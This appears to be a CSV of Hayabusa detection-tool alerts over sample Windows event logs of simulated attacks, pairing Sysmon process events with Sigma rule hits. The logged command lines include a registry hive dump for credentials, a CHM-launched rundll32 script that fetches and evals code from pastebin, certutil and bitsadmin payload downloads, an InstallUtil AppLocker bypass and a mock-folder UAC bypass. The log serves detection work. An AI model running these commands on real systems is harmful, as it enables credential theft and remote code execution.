2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-DD9F-5D31-0000-00108D524B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,../hayabusa-rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,../hayabusa-rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
